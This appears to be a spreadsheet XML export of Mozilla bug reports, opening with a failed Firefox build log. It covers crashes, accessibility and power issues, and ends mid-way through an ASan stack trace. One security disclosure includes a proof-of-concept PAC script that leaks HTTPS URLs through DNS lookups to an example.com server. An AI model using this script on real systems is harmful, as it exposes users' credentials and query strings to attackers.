[task 2019-02-12T05:33:29.654Z] 05:33:29     INFO -  checking whether the C++ compiler supports -Wno-gnu-zero-variadic-macro-arguments... no
[task 2019-02-12T05:33:29.816Z] 05:33:29     INFO -  checking whether the C++ compiler supports -fno-sized-deallocation... yes
[task 2019-02-12T05:33:29.823Z] 05:33:29     INFO -  checking for libpulse... yes
[task 2019-02-12T05:33:29.965Z] 05:33:29     INFO -  checking MOZ_PULSEAUDIO_CFLAGS... -D_REENTRANT
[task 2019-02-12T05:33:30.107Z] 05:33:30     INFO -  checking MOZ_PULSEAUDIO_LIBS... -lpulse
[task 2019-02-12T05:33:30.108Z] 05:33:30     INFO -  checking for cbindgen... /builds/worker/workspace/build/src/cbindgen/cbindgen
[task 2019-02-12T05:33:30.251Z] 05:33:30     INFO -  checking cbindgen version... 0.7.1
[task 2019-02-12T05:33:30.252Z] 05:33:30     INFO -  checking for rustfmt... /builds/worker/workspace/build/src/rustc/bin/rustfmt
[task 2019-02-12T05:33:30.252Z] 05:33:30     INFO -  checking for llvm-config... /builds/worker/workspace/build/src/clang/bin/llvm-config
[task 2019-02-12T05:33:30.860Z] 05:33:30     INFO -  checking bindgen cflags... -x c++ -fno-sized-deallocation -DTRACING=1 -DIMPL_LIBXUL -DMOZILLA_INTERNAL_API -DRUST_BINDGEN -DOS_POSIX=1 -DOS_LINUX=1
[task 2019-02-12T05:33:30.862Z] 05:33:30     INFO -  checking for rustc... /builds/worker/workspace/build/src/rustc/bin/rustc
[task 2019-02-12T05:33:30.862Z] 05:33:30     INFO -  checking for cargo... /builds/worker/workspace/build/src/rustc/bin/cargo
[task 2019-02-12T05:33:31.039Z] 05:33:31     INFO -  checking rustc version... 1.31.0-nightly
[task 2019-02-12T05:33:31.196Z] 05:33:31     INFO -  checking cargo version... 1.31.0
[task 2019-02-12T05:33:31.196Z] 05:33:31     INFO -  ERROR: Rust compiler 1.31.0-nightly is too old.
[task 2019-02-12T05:33:31.196Z] 05:33:31     INFO -  To compile Rust language sources please install at least
[task 2019-02-12T05:33:31.196Z] 05:33:31     INFO -  version 1.32.0 of the 'rustc' toolchain and make sure it is
[task 2019-02-12T05:33:31.196Z] 05:33:31     INFO -  first in your path.
[task 2019-02-12T05:33:31.196Z] 05:33:31     INFO -  You can verify this by typing 'rustc --version'.
[task 2019-02-12T05:33:31.197Z] 05:33:31     INFO -  If you have the 'rustup' tool installed you can upgrade
[task 2019-02-12T05:33:31.197Z] 05:33:31     INFO -  to the latest release by typing 'rustup update'. The
[task 2019-02-12T05:33:31.197Z] 05:33:31     INFO -  installer is available from https://rustup.rs/
[task 2019-02-12T05:33:31.233Z] 05:33:31     INFO -  *** Fix above errors and then restart with\
[task 2019-02-12T05:33:31.233Z] 05:33:31     INFO -                 "./mach build"
[task 2019-02-12T05:33:31.233Z] 05:33:31     INFO -  client.mk:111: recipe for target 'configure' failed
[task 2019-02-12T05:33:31.233Z] 05:33:31     INFO -  make: *** [configure] Error 1
[task 2019-02-12T05:33:31.345Z] 05:33:31    ERROR - Return code: 2
[task 2019-02-12T05:33:31.345Z] 05:33:31  WARNING - setting return code to 2
[task 2019-02-12T05:33:31.345Z] 05:33:31    FATAL - 'mach build -v' did not run successfully. Please check log for errors.
[task 2019-02-12T05:33:31.345Z] 05:33:31    FATAL - Running post_fatal callback...
[task 2019-02-12T05:33:31.345Z] 05:33:31    FATAL - Exiting -1
[task 2019-02-12T05:33:31.346Z] 05:33:31     INFO - [mozharness: 2019-02-12 05:33:31.345951Z] Finished build step (failed)
[task 2019-02-12T05:33:31.346Z] 05:33:31     INFO - Running post-run listener: _parse_build_tests_ccov
[task 2019-02-12T05:33:31.346Z] 05:33:31     INFO - Running post-run listener: _shutdown_sccache
[task 2019-02-12T05:33:31.346Z] 05:33:31     INFO - Running command: ['/builds/worker/workspace/build/src/sccache2/sccache', '--stop-server'] in /builds/worker/workspace/build/src
[task 2019-02-12T05:33:31.346Z] 05:33:31     INFO - Copy/paste: /builds/worker/workspace/build/src/sccache2/sccache --stop-server
[task 2019-02-12T05:33:31.350Z] 05:33:31     INFO -  Stopping sccache server...
[task 2019-02-12T05:33:31.351Z] 05:33:31     INFO -  error: couldn't connect to server
[task 2019-02-12T05:33:31.351Z] 05:33:31     INFO -  caused by: Connection refused (os error 111)
[task 2019-02-12T05:33:31.351Z] 05:33:31    ERROR - Return code: 2
[task 2019-02-12T05:33:31.351Z] 05:33:31     INFO - Running post-run listener: _summarize
[task 2019-02-12T05:33:31.351Z] 05:33:31    ERROR - # TBPL FAILURE #
[task 2019-02-12T05:33:31.351Z] 05:33:31     INFO - [mozharness: 2019-02-12 05:33:31.351791Z] FxDesktopBuild summary:
[task 2019-02-12T05:33:31.352Z] 05:33:31    ERROR - # TBPL FAILURE #
[task 2019-02-12T05:33:31.359Z] cleanup
[task 2019-02-12T05:33:31.359Z] + cleanup
[task 2019-02-12T05:33:31.359Z] + local rv=255
[task 2019-02-12T05:33:31.359Z] + cleanup_xvfb
[task 2019-02-12T05:33:31.359Z] pidof Xvfb
[task 2019-02-12T05:33:31.359Z] ++ pidof Xvfb
[task 2019-02-12T05:33:31.360Z] + local xvfb_pid=34
[task 2019-02-12T05:33:31.360Z] + local vnc=false
[task 2019-02-12T05:33:31.361Z] + local interactive=false
[task 2019-02-12T05:33:31.361Z] + '[' -n 34 ']'
[task 2019-02-12T05:33:31.361Z] + [[ false == false ]]
[task 2019-02-12T05:33:31.361Z] + [[ false == false ]]
[task 2019-02-12T05:33:31.361Z] + kill 34
[task 2019-02-12T05:33:31.361Z] + screen -XS xvfb quit
[task 2019-02-12T05:33:31.504Z] No screen session found.
[task 2019-02-12T05:33:31.504Z] + true
[task 2019-02-12T05:33:31.504Z] + exit 255
[taskcluster 2019-02-12 05:33:32.501Z] === Task Finished ===
[taskcluster 2019-02-12 05:33:37.682Z] Unsuccessful task run with exit code: 255 completed in 130.121 seconds</t>
        </is>
      </c>
      <c r="X6352" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6353">
      <c r="A6353" t="n">
        <v>323015</v>
      </c>
      <c r="B6353" t="inlineStr">
        <is>
          <t>2006-01-10 22:31:52 -0800</t>
        </is>
      </c>
      <c r="C6353" t="inlineStr">
        <is>
          <t>tinderbox build name generation (Linux)</t>
        </is>
      </c>
      <c r="D6353" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6353" t="n">
        <v>1</v>
      </c>
      <c r="F6353" t="n">
        <v>1</v>
      </c>
      <c r="G6353" t="n">
        <v>5</v>
      </c>
      <c r="H6353" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6353" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6353" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6353" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6353" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6353" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6353" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6353" t="inlineStr"/>
      <c r="Q6353" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6353" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6353" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6353" t="n">
        <v>1</v>
      </c>
      <c r="U6353" t="n">
        <v>0</v>
      </c>
      <c r="V6353" t="n">
        <v>10</v>
      </c>
      <c r="W6353" t="inlineStr">
        <is>
          <t>build-seamonkey-util.pl generates the name of the tinderbox for a Linux x86-64 build as follows:
$Settings::OS ${os_ver} $host $build_type
since there is no exception in if ($Settings::OS eq 'Linux')
${os_ver} expands to "uname -r" which is in most cases not really important.
I would suggest to use
$Settings::OS/$Settings::CPU $host $build_type
for alpha, sparc, ppc and x86_64 platforms.
Opinions?</t>
        </is>
      </c>
      <c r="X6353" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6354">
      <c r="A6354" t="n">
        <v>1255474</v>
      </c>
      <c r="B6354" t="inlineStr">
        <is>
          <t>2016-03-10 09:03:36 -0800</t>
        </is>
      </c>
      <c r="C6354" t="inlineStr">
        <is>
          <t>Proxy Auto-Config SSL/TLS Url Disclosure</t>
        </is>
      </c>
      <c r="D6354" t="inlineStr">
        <is>
          <t>2017-03-05 10:19:49 -0800</t>
        </is>
      </c>
      <c r="E6354" t="n">
        <v>1</v>
      </c>
      <c r="F6354" t="n">
        <v>1</v>
      </c>
      <c r="G6354" t="n">
        <v>3</v>
      </c>
      <c r="H6354" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6354" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6354" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6354" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6354" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6354" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6354" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6354" t="inlineStr">
        <is>
          <t>[necko-active][adv-main51+]</t>
        </is>
      </c>
      <c r="Q6354" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6354" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6354" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T6354" t="n">
        <v>1</v>
      </c>
      <c r="U6354" t="n">
        <v>0</v>
      </c>
      <c r="V6354" t="n">
        <v>54</v>
      </c>
      <c r="W6354" t="inlineStr">
        <is>
          <t>Description:        Proxy Auto-Config SSL/TLS Url Disclosure
Versions Affected:  All
Category:           Information Disclosure
Reporter:           Alex Chapman and Paul Stone of Context Information Security 
Summary:
--------
Malicious Proxy Auto-Config (PAC) files allow for the disclosure of SSL/TLS encrypted HTTPS request URLs (including full paths and query strings) from Firefox. The PAC file specifies a Javascript function, FindProxyForURL(url, host), which is called for each URL request in order to determine the required proxy for the connection. This function receives the full URL and hostname for both HTTP and HTTPS requests, which can be leaked by a malicious PAC script. This could expose credentials, tokens, search terms or any other data passed in HTTPS URL query strings to internet based attackers that would otherwise be encrypted. This issue does not affect the default configuration of Firefox.
Analysis:
---------
The PAC file is executed in a limited, sandboxed Javascript environment, but some functions are still available (see http://findproxyforurl.com/pac-functions/), most notably dnsResolve. This allows for the full request URL from affected clients to be leaked to an attacker's DNS server or local network hosts via LLMNR.
Since PAC files must be specified manually (either in Firefox or in the system proxy settings), this issue would require a network-based attacker to be able to intercept network traffic of a client configured with a PAC file. For example, this could be performed by a malicious gateway.
All software that implements the PAC specification as written is affected by this issue. We have has confirmed this issue in a number of browsers and operating systems. Notably however, Internet Explorer does not leak full URLs, instead passing only the protocol and hostname to the 'url' parameter of FindProxyForURL (e.g. https://www.example.com/, not https://www.example.com/index.html?foo=bar). Therefore a possible fix for this issues is to follow this same behaviour.
Proof of Concept:
-----------------
A PAC script can be crafted, as below, which will perform a DNS lookup based on the host and url parameters passed into the function:
  function FindProxyForURL(url, host){{
    if (dnsResolve((url+'.example.com').replace(/[^a-z0-9_-]+/gi,'.')))
      return "DIRECT";
    return "DIRECT";
  }}
This will perform DNS lookups with the encoded URLs against the example.com DNS server.
See the following example DNS captures from HTTPS requests:
  https.incoming.telemetry.mozilla.org.submit.telemetry.0b2fe929-bff9-4421-9a77-9247930853db.main.Firefox.44.0.2.release.20160210153822.v.4.example.com.
  https.www.google.com.complete.search.client.firefox.q.secre.example.com.
  https.www.google.com.complete.search.client.firefox.q.secret.example.com.</t>
        </is>
      </c>
      <c r="X6354" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6355">
      <c r="A6355" t="n">
        <v>969517</v>
      </c>
      <c r="B6355" t="inlineStr">
        <is>
          <t>2014-02-07 11:14:02 -0800</t>
        </is>
      </c>
      <c r="C6355" t="inlineStr">
        <is>
          <t>Faulty/ASan: heap-use-after-free of a LayerComposite that was destroyed by ContainerLayer::RemoveChild</t>
        </is>
      </c>
      <c r="D6355" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:51 -0700</t>
        </is>
      </c>
      <c r="E6355" t="n">
        <v>1</v>
      </c>
      <c r="F6355" t="n">
        <v>1</v>
      </c>
      <c r="G6355" t="n">
        <v>3</v>
      </c>
      <c r="H6355" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6355" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6355" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6355" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6355" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6355" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6355" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6355" t="inlineStr">
        <is>
          <t>[adv-main30+][qa-]</t>
        </is>
      </c>
      <c r="Q6355" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6355" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6355" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T6355" t="n">
        <v>1</v>
      </c>
      <c r="U6355" t="n">
        <v>0</v>
      </c>
      <c r="V6355" t="n">
        <v>8</v>
      </c>
      <c r="W6355" t="inlineStr">
        <is>
          <t>Created attachment 8372456
Faulty/ASan session
Found by Christoph Diehl's "Faulty" fuzzer, see bug 777067</t>
        </is>
      </c>
      <c r="X6355" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6356">
      <c r="A6356" t="n">
        <v>248378</v>
      </c>
      <c r="B6356" t="inlineStr">
        <is>
          <t>2004-06-23 13:05:41 -0700</t>
        </is>
      </c>
      <c r="C6356" t="inlineStr">
        <is>
          <t>Mozilla not exposing MSAA info on release builds</t>
        </is>
      </c>
      <c r="D6356" t="inlineStr">
        <is>
          <t>2019-05-03 14:53:29 -0700</t>
        </is>
      </c>
      <c r="E6356" t="n">
        <v>1</v>
      </c>
      <c r="F6356" t="n">
        <v>1</v>
      </c>
      <c r="G6356" t="n">
        <v>3</v>
      </c>
      <c r="H6356" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6356" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6356" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K6356" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6356" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6356" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6356" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6356" t="inlineStr"/>
      <c r="Q6356" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6356" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6356" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6356" t="n">
        <v>1</v>
      </c>
      <c r="U6356" t="n">
        <v>0</v>
      </c>
      <c r="V6356" t="n">
        <v>7</v>
      </c>
      <c r="W6356" t="inlineStr">
        <is>
          <t>MSAA SDK tools and screen readers are not working with release builds here:
http://ftp.mozilla.org/pub/mozilla.org/mozilla/nightly/latest-trunk/
However, they are working in debug builds built from the same source.
This has been a problem since at least 6/22, perhaps as long back as 6/15.
Not sure if there is also an issue with ATK support. Perhaps Sun can check.</t>
        </is>
      </c>
      <c r="X6356" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6357">
      <c r="A6357" t="n">
        <v>872430</v>
      </c>
      <c r="B6357" t="inlineStr">
        <is>
          <t>2013-05-15 01:22:08 -0700</t>
        </is>
      </c>
      <c r="C6357" t="inlineStr">
        <is>
          <t>FM Radio shouldn`t use CPU wake lock, should have sleep state.</t>
        </is>
      </c>
      <c r="D6357" t="inlineStr">
        <is>
          <t>2013-06-21 02:41:31 -0700</t>
        </is>
      </c>
      <c r="E6357" t="n">
        <v>1</v>
      </c>
      <c r="F6357" t="n">
        <v>1</v>
      </c>
      <c r="G6357" t="n">
        <v>6</v>
      </c>
      <c r="H6357" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6357" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6357" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6357" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6357" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6357" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6357" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6357" t="inlineStr">
        <is>
          <t>MiniWW</t>
        </is>
      </c>
      <c r="Q6357" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6357" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6357" t="inlineStr">
        <is>
          <t>1.1 QE2 (6jun)</t>
        </is>
      </c>
      <c r="T6357" t="n">
        <v>1</v>
      </c>
      <c r="U6357" t="n">
        <v>0</v>
      </c>
      <c r="V6357" t="n">
        <v>38</v>
      </c>
      <c r="W6357" t="inlineStr">
        <is>
          <t>BuildID revision="7cb46499e0b91ca20f6aed58d6067d7c451875b9"
gaia revision="5cbb19e4bb78a7ad879fbe4b9a841e1c35714f5c"
gecko revision="950b402b6188bb2f3ce3176e620ed5249719d720"
The media apps generally use CPU wake lock. But FM Radio is available to play without CPU wake lock.
Currently FM Radio dosen`t use wake lock in fm.js, but I checked to use wake lock by Bug 828283. 
===================================================================
screen_manager.js
          // If some audio channel is active we refresh the cpuSleepAllowed
          // immediately, otherwise we just use a timer in order to prevert
          // rapid stop/start.
          if (audioActive) {
            this._audioActive = true;
            this.refreshCpuSleepAllowed();
          } else {
            var self = this;
            this._audioCpuSleepTimerId = setTimeout(function cpuSleepTimer() {
              self._audioActive = false;
              self.refreshCpuSleepAllowed();
              self._audioCpuSleepTimerId = 0;
            }, 2000);
          }
        }
===================================================================
I think It is at risk for power consumption and it should need to make improvement Cpu wake lock/unlock.
Please let you test FM Radio.
1. Enable FM Radio during plying music.
2. Play Music/Video during enabling FM Radio.
3. Plug/Unplug headset during enabling FM Radio in foreground/backgrond state.
4. Incomming calls during enabling FM Radio.</t>
        </is>
      </c>
      <c r="X6357" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6358">
      <c r="A6358" t="n">
        <v>1742334</v>
      </c>
      <c r="B6358" t="inlineStr">
        <is>
          <t>2021-11-21 23:00:20 -0800</t>
        </is>
      </c>
      <c r="C6358" t="inlineStr">
        <is>
          <t>Use-after-free of ChannelEventQueue::mOwner</t>
        </is>
      </c>
      <c r="D6358" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:20 -0700</t>
        </is>
      </c>
      <c r="E6358" t="n">
        <v>1</v>
      </c>
      <c r="F6358" t="n">
        <v>1</v>
      </c>
      <c r="G6358" t="n">
        <v>3</v>
      </c>
      <c r="H6358" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6358" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6358" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K6358" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6358" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6358" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6358" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6358" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][necko-triaged][sec-survey][adv-main96+][adv-ESR91.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6358" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6358" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6358" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T6358" t="n">
        <v>1</v>
      </c>
      <c r="U6358" t="n">
        <v>0</v>
      </c>
      <c r="V6358" t="n">
        <v>17</v>
      </c>
      <c r="W6358" t="inlineStr">
        <is>
          <t>Created attachment 9251836
poc.7z
Tested Version: Ubuntu 64-bit memory 8G + linux64-fuzzing-asan-opt(94.0.2 (64-bit)) =&gt; linux64-fuzzing-asan-opt
Loading poc.html into the firefox browser to create a new tab(Using the grizzly tool(allow pop-ups)),I feel that this is a conditional competition vulnerability, This poc is not 100% stable, and I can only trigger it in the docker container,if it fails, please repeat more times. the crash report is as follows:
```
==239309==ERROR: AddressSanitizer: heap-use-after-free on address 0x61c0001c0100 at pc 0x7f44482fcb3a bp 0x7ffd9fa08970 sp 0x7ffd9fa08968
READ of size 8 at 0x61c0001c0100 thread T0 (Web Content)
    #0 0x7f44482fcb39 in nsCOMPtr /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:928:7
    #1 0x7f44482fcb39 in CompleteResumeRunnable /builds/worker/checkouts/gecko/netwerk/ipc/ChannelEventQueue.cpp:145:13
    #2 0x7f44482fcb39 in mozilla::net::ChannelEventQueue::ResumeInternal() /builds/worker/checkouts/gecko/netwerk/ipc/ChannelEventQueue.cpp:160:34
    #3 0x7f44482fc665 in mozilla::net::ChannelEventQueue::Resume() /builds/worker/checkouts/gecko/netwerk/ipc/ChannelEventQueue.cpp:117:3
    #4 0x7f444a77a876 in mozilla::dom::Document::UnsuppressEventHandlingAndFireEvents(bool) /builds/worker/checkouts/gecko/dom/base/Document.cpp:12460:16
    #5 0x7f444a55c7d7 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:1189:13
    #6 0x7f444a5b3c9c in nsGlobalWindowOuter::DetachFromDocShell(bool) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:2700:12
    #7 0x7f4452131ce6 in nsDocShell::Destroy() /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:4438:20
    #8 0x7f44527be8ed in nsWebBrowser::SetDocShell(nsDocShell*) /builds/worker/checkouts/gecko/toolkit/components/browser/nsWebBrowser.cpp:1122:18
    #9 0x7f44527bdc0c in nsWebBrowser::InternalDestroy() /builds/worker/checkouts/gecko/toolkit/components/browser/nsWebBrowser.cpp:175:3
    #10 0x7f44527c35ec in Destroy /builds/worker/checkouts/gecko/toolkit/components/browser/nsWebBrowser.cpp:855:3
    #11 0x7f44527c35ec in non-virtual thunk to nsWebBrowser::Destroy() /builds/worker/checkouts/gecko/toolkit/components/browser/nsWebBrowser.cpp
    #12 0x7f444e3fe510 in mozilla::dom::BrowserChild::DestroyWindow() /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:899:31
    #13 0x7f444e4168c8 in mozilla::dom::BrowserChild::RecvDestroy() /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:2632:3
    #14 0x7f44492c1a7d in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBrowserChild.cpp:6620:56
    #15 0x7f4448906bfc in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PContentChild.cpp:8200:32
    #16 0x7f44486a18e9 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2043:25
    #17 0x7f444869e756 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1968:9
    #18 0x7f444869ff22 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1827:3
    #19 0x7f44486a0867 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1855:14
    #20 0x7f444726888a in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467:16
    #21 0x7f4447234f62 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770:26
    #22 0x7f4447232798 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606:15
    #23 0x7f4447232ec0 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390:36
    #24 0x7f444726ff54 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:126:37
    #25 0x7f444726ff54 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_1&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531:5
    #26 0x7f444725150b in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1148:16
    #27 0x7f444725b42c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467:10
    #28 0x7f444e3a02ac in bool mozilla::SpinEventLoopUntil&lt;(mozilla::ProcessFailureBehavior)1, mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::BrowserChild*, nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**)::$_8&gt;(mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::BrowserChild*, nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**)::$_8&amp;&amp;, nsIThread*) /builds/worker/workspace/obj-build/dist/include/mozilla/SpinEventLoopUntil.h:93:25
    #29 0x7f444e39d2fb in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::BrowserChild*, nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/ipc/ContentChild.cpp:1227:5
    #30 0x7f444e3fd899 in mozilla::dom::BrowserChild::ProvideWindow(nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:851:14
    #31 0x7f4452cc2ff9 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, bool, nsIArray*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:842:24
    #32 0x7f4452cc7188 in nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, bool, nsISupports*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:376:10
